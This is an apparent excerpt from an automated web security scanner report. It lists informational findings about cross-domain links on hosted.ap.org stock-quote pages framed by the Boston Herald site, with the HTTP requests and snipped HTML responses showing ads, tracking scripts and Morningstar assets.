<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2"/></div>
...[SNIP]...
<!-- MIVA -->
<link rel="stylesheet" type="text/css" href="http://v11.mivaInLine.us.miva.com/MIVALine/HighlightKeywords.css">

<SCRIPT LANGUAGE="JavaScript1.1">
...[SNIP]...
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1" >        
<link rel="stylesheet" type="text/css" href="http://ibd.morningstar.com/AP/Table.css" >
<link rel="stylesheet" type="text/css" href="http://ibd.morningstar.com/AP/morningstar.css" >
   
<script type="text/javascript">
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<input type="text" name="ticker" size=20 value="Enter ticker or name" maxlength=64 onclick="javascript:ClearAPInput()" class=TextTool><img src="http://im.morningstar.com/im/dot_clear.gif" height=1 width=10>
       <input type="image" border=0 src="http://ibd.morningstar.com/im/go.gif" width=24 height=16 align=absmiddle>
...[SNIP]...
<a href="javascript:ToolTopOpenWin('http://www.morningstar.com/')"><img src="http://im.morningstar.com/im/TheMstarLogo.gif" width=166 height=33 border=0></a>
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5" width="260"></td>
...[SNIP]...
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="5" width="215"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="70"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="40"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="20" width="1"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td align="left"><img src="http://im.morningstar.com/im/dot_clear.gif" height="5"></td>
...[SNIP]...
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="10" width="85"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="104"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="104"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="107"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="80"></td>
<td><img src="http://im.morningstar.com/im/dot_clear.gif" height="1" width="80"></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height="10"/></td>
...[SNIP]...
</style>
<link rel="stylesheet" href="//ibd.morningstar.com/quicktake/morningstarEN.css">
<script language="javascript">
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<a href="javascript:footeropenwin('http://www.morningstar.com',0,0)" class=LinkDisc>
           <img src="https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif" width="102" height="28" border="0" /></a>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<div id="adMiddle" style="padding-top:15px">
<IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</div>
   <a href="http://www.4info.net/logon.jsp" style="color:#000099">Modify or Cancel alerts</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<div id="AdBottom">
        <IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_bottom ID=i_bottom FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="BottomNav">
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/contact/">Contact us</a>&nbsp;&nbsp;|&nbsp;&nbsp;

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/print/">Print advertising</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/online/">Online advertising</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/history/">Herald history</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/tips/">News tips</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/electronic/">Electronic edition</a>&nbsp;&nbsp;|&nbsp;&nbsp;

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/browser/">Browser upgrade</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/home_delivery/">Home delivery</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/wireless">Herald wireless</a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.191. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:19 GMT
Content-Length: 32594
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<div id="headerLogo">
<a href="http://www.bostonherald.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
    </div>
    <div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="home" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/"><a href="/homepage.bg">
...[SNIP]...
<div id="news" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/news/">News &amp; Opinion</a>
...[SNIP]...
<div id="sports" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<div id="entertainment" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<div id="business" class="tabSelected"><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<div id="inside" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<div id="blogs" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<div id="media" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/mediacenter">Photos &amp; Media</a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.carfind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind">Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.homefind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind">Homefind</a>
...[SNIP]...
div id="jobfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind">Jobfind</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2"/></div>
...[SNIP]...
<!-- MIVA -->
<link rel="stylesheet" type="text/css" href="http://v11.mivaInLine.us.miva.com/MIVALine/HighlightKeywords.css">

<SCRIPT LANGUAGE="JavaScript1.1">
...[SNIP]...
<meta http-equiv="Content-type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="http://ibd.morningstar.com/AP/TickerLookup.css">
<script language="javascript">
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<input type="text" name="ticker" size=20 value="Enter ticker or name" maxlength=64 onclick="javascript:ClearAPInput()" class=TextTool><img src="http://im.morningstar.com/im/dot_clear.gif" height=1 width=10>
       <input type="image" border=0 src="http://ibd.morningstar.com/im/go.gif" width=24 height=16 align=absmiddle>
...[SNIP]...
<a href="javascript:ToolTopOpenWin('http://www.morningstar.com/')"><img src="http://im.morningstar.com/im/TheMstarLogo.gif" width=166 height=33 border=0></a>
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<td colspan=2><img src="http://im.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td width=10><img src="https://ibd.morningstar.com/im/topleft_cornerW.gif" width=10 height=24></td>
...[SNIP]...
<td width=10><img src="https://ibd.morningstar.com/im/topright_cornerW.gif" width=10 height=24></td>
...[SNIP]...
<td colspan=3><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td colspan=3><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=20 width=10></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=200></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=20></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=265></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=20></td>
       <td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10 width=50></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif"></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif"></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif"></td>
...[SNIP]...
<td colspan=6><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=20></td></tr>
   <tr><td colspan=6 class=RulerTitle1><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=1></td></tr>
   <tr><td colspan=6 class=RulerTitle2><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=20 width=565></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=100></td>
...[SNIP]...
<td><img src="https://im.morningstar.com/im/dot_clear.gif" height=1></td>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height="10"/></td>
...[SNIP]...
</style>
<link rel="stylesheet" href="//ibd.morningstar.com/quicktake/morningstarEN.css">
<script language="javascript">
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<a href="javascript:footeropenwin('http://www.morningstar.com',0,0)" class=LinkDisc>
           <img src="https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif" width="102" height="28" border="0" /></a>
...[SNIP]...
<td><img src="https://ibd.morningstar.com/im/dot_clear.gif" height=10></td>
...[SNIP]...
<div id="adMiddle" style="padding-top:15px">
<IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</div>
   <a href="http://www.4info.net/logon.jsp" style="color:#000099">Modify or Cancel alerts</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<div id="AdBottom">
        <IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_bottom ID=i_bottom FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="BottomNav">
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/contact/">Contact us</a>&nbsp;&nbsp;|&nbsp;&nbsp;

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/print/">Print advertising</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/online/">Online advertising</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/history/">Herald history</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/tips/">News tips</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/electronic/">Electronic edition</a>&nbsp;&nbsp;|&nbsp;&nbsp;

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/browser/">Browser upgrade</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/home_delivery/">Home delivery</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/wireless">Herald wireless</a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.192. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP707&valid=NO&set=new&view=quote&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html;charset=utf-8
Expires: Sat, 29 Jan 2011 04:49:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:22 GMT
Content-Length: 26005
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<div id="headerLogo">
<a href="http://www.bostonherald.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
    </div>
    <div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="home" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/"><a href="/homepage.bg">
...[SNIP]...
<div id="news" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/news/">News &amp; Opinion</a>
...[SNIP]...
<div id="sports" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/sports/">Sports</a>
...[SNIP]...
<div id="entertainment" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/entertainment/">Entertainment</a>
...[SNIP]...
<div id="business" class="tabSelected"><a href="http://www.bostonherald.com/business/">Business</a>
...[SNIP]...
<div id="inside" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/track/">Inside Track</a>
...[SNIP]...
<div id="blogs" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/blogs/">Blogs</a>
...[SNIP]...
<div id="media" class="tab" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/mediacenter">Photos &amp; Media</a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.carfind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind">Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.homefind.com/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind">Homefind</a>
...[SNIP]...
div id="jobfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a href="http://www.bostonherald.com/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind">Jobfind</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsbsh9gu00000w80nzrti22h_8o9i/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2"/></div>
...[SNIP]...
<!-- MIVA -->
<link rel="stylesheet" type="text/css" href="http://v11.mivaInLine.us.miva.com/MIVALine/HighlightKeywords.css">

<SCRIPT LANGUAGE="JavaScript1.1">
...[SNIP]...
<!-- END GLOBAL CONTENT -->
<script type="text/javascript" src="http://ibd.morningstar.com/quicktake/standard/client/shell/cobrand.js"></script>


<div id="MStarCommonPanel">

<link href="http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/cobrand.css" type="text/css" rel="stylesheet" />
<link href="http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/morningstaren.css" type="text/css" rel="stylesheet" />
<link href="http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/quote.css" type="text/css" rel="stylesheet" />
<link href="http://ibd.morningstar.com/quicktake/standard/client/shell/App_Themes/tabnav.css" type="text/css" rel="stylesheet" />

<html>
...[SNIP]...
<td><img src="https://im.morningstar.com/im/dot_clear.gif" height="10" width="1"></td>
...[SNIP]...
<td class="msSmall"><a href="http://www.morningstar.com" target="_blank"><img src="https://im.morningstar.com/imCobrand/MorningstarLogo_102X28.gif" border="0" height="28" width="102"></a><br><a href="http://www.morningstar.com" target="_blank">.. Copyright 2011 Morningstar, Inc.</a>
...[SNIP]...
<td><img src="https://im.morningstar.com/im/dot_clear.gif" height="10" width="1"></td>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ibd.morningstar.com/quicktake/standard/client/shell/GetSecList.axd?cn=AP707&ticker=&items=30&pages=10&pageno=0"></script>
...[SNIP]...
<div id="adMiddle" style="padding-top:15px">
<IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</div>
   <a href="http://www.4info.net/logon.jsp" style="color:#000099">Modify or Cancel alerts</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<div id="AdBottom">
        <IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_bottom ID=i_bottom FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch"></IFRAME>
...[SNIP]...
<div id="BottomNav">
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/contact/">Contact us</a>&nbsp;&nbsp;|&nbsp;&nbsp;

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/print/">Print advertising</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediakit/online/">Online advertising</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/history/">Herald history</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/tips/">News tips</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/electronic/">Electronic edition</a>&nbsp;&nbsp;|&nbsp;&nbsp;

        <a class="LinksRedNone" href="http://www.bostonherald.com/mediacenter/browser/">Browser upgrade</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/about/home_delivery/">Home delivery</a>&nbsp;&nbsp;|&nbsp;&nbsp;
        <a class="LinksRedNone" href="http://www.bostonherald.com/wireless">Herald wireless</a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.193. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/javascript
Vary: Accept-Encoding
Expires: Fri, 28 Jan 2011 21:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 21:57:28 GMT
Connection: close
Content-Length: 8304

document.write( '<!--GLOBAL FALSE FOR PROXY-PARTIAL-->');
document.write( '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">');
...[SNIP]...
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1"/>');
document.write( ' <link rel="stylesheet" type="text/css" href="http://ibd.morningstar.com/AP/graph.css"/>');
document.write( ' <style type="text/css">
...[SNIP]...
</style>');
document.write( ' <script type="text/javascript" src="http://ibd.morningstar.com/AP/graph.js"></script>
...[SNIP]...
<td class="Rule" width="64"><img src="http://im.morningstar.com/im/dot_clear.gif" width="4" height="1"></td>
...[SNIP]...
<td class="Rule2" colspan="5"><img src="https://im.morningstar.com/im/dot_clear.gif" width="175" height="5"></td>
...[SNIP]...
<a href="javascript:apSubmitTickerLP(\'&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE=\')"><img border="0" src="http://im.morningstar.com/im/hp_go.jpg" align="middle" /></a>
